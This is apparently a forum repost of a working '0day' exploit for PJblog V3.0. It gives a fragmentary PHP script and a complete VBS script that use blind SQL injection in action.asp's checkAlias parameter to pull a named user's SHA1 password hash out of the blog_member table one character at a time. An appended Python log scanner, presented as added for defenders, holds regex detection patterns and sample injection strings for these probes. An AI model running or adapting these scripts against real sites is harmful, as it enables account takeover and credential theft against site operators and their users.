PJblog V3.0 0day: PHP and VBS exploit tools

The PHP version is as follows:
[code]
=\''.$tmp_PassWord.substr($var_hash,$j,1).'\') And "1"="1';
$injecturl = rawurlencode($injecturl);
$injecturl = $var_holeurl.$injecturl;
if(!CheckHole($injecturl)){
$tmp_PassWord = $tmp_PassWord.substr($var_hash,$j-1,1);
break;
}
print "\rPassword(SHA1):".$tmp_PassWord.substr($var_hash,$j,1);
}
}
print "\r\nDone!";

function CheckHole($temp_url)
{
$var_pagelen=file_get_contents($temp_url);
$var_newpagelen=strpos($var_pagelen, 'check_error');
return $var_newpagelen;
}
?>
[/code]

The VBS version of the exploit tool is as follows:
[code]
If WScript.Arguments.Count <> 2 Then
WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
WScript.Quit
End If

attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
attackUrl = attackUrl & "/"
End If
SHA1Charset = "0123456789ABCDEFJ"
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""

If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
WScript.Echo "恭喜!存在漏洞"
Else
WScript.Echo "没有检测到漏洞"
WScript.Quit
End If

For n=1 To 40
For i=1 To 17
strInject = strHoleUrl & " or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
If Not IsSuccess(strInject) Then
strResult = strResult & Mid(SHA1Charset, i-1, 1)
Exit For
End If
strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
WScript.StdOut.Write strPrint
Next
Next
WScript.Echo Chr(13) & Chr (10) & "Done!"

Function PostData(PostUrl)
Dim Http
Set Http = CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET",PostUrl,False
.Send ()
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function

Function IsSuccess(PostUrl)
strData = PostData(PostUrl)
'Wscript.Echo strData
if InStr(strData,"check_error") >0 then
IsSuccess = True
Else
IsSuccess = False
End If
'Wscript.Sleep 500 'let the system rest for a moment
End Function
[/code]

Usage: Cscript.exe Exp.vbs <forum URL to check> <username to check>
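For defenders reviewing web server logs, the following added example (not part of the original post) flags requests to `action.asp?action=checkAlias` whose `cname` value matches the probes both scripts send, and reports how long a password-hash guess each client reached. The IIS-style field layout, the sample log lines, the username `someuser` and names such as `scan` are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, quote

# Constructed sample data. Assumed field order (IIS W3C style):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
def _line(ip, cname):
    return f"2009-05-01 10:00:00 {ip} GET /action.asp action=checkAlias&cname={quote(cname)} 200"

_Q = "0kee\" or 0<(Select Count(*) From blog_member Where mem_name='someuser' And mem_password>='{}') And \"1\"=\"1"
SAMPLE_LOG = "\n".join([
    _line("198.51.100.20", "alice"),             # ordinary alias check
    _line("203.0.113.7", '0kee"or "1"="1'),      # boolean probe (true branch)
    _line("203.0.113.7", '0kee"and "1"="2'),     # boolean probe (false branch)
    _line("203.0.113.7", _Q.format("0")),        # extraction probe, 1-char guess
    _line("203.0.113.7", _Q.format("A3F")),      # extraction probe, 3-char guess
    "2009-05-01 10:00:09 198.51.100.20 GET /default.asp - 200",
])

# A double quote breaks out of the cname string; the table and column names
# are the ones the scripts on this page query.
SQLI = re.compile(r'"|\b(select|union)\b|blog_member|mem_password', re.I)
EXTRACT = re.compile(r"mem_password\s*>=\s*'([^']*)", re.I)

def scan(log_text):
    """Return {client_ip: {"probes": n, "longest_guess": k}} for suspicious requests."""
    hits = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 7 or not parts[4].lower().endswith("/action.asp"):
            continue
        # ASP treats parameter names case-insensitively, so normalise the keys.
        qs = {k.lower(): v[0] for k, v in parse_qs(parts[5]).items()}
        cname = qs.get("cname", "")
        if qs.get("action", "").lower() != "checkalias" or not SQLI.search(cname):
            continue
        rec = hits.setdefault(parts[2], {"probes": 0, "longest_guess": 0})
        rec["probes"] += 1
        m = EXTRACT.search(cname)
        if m:  # length of the compared string shows how far the extraction got
            rec["longest_guess"] = max(rec["longest_guess"], len(m.group(1)))
    return hits

if __name__ == "__main__":
    for ip, rec in scan(SAMPLE_LOG).items():
        print(ip, rec)
```

A `longest_guess` of 40 for an account means the full SHA1 hash was compared and should be treated as disclosed.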
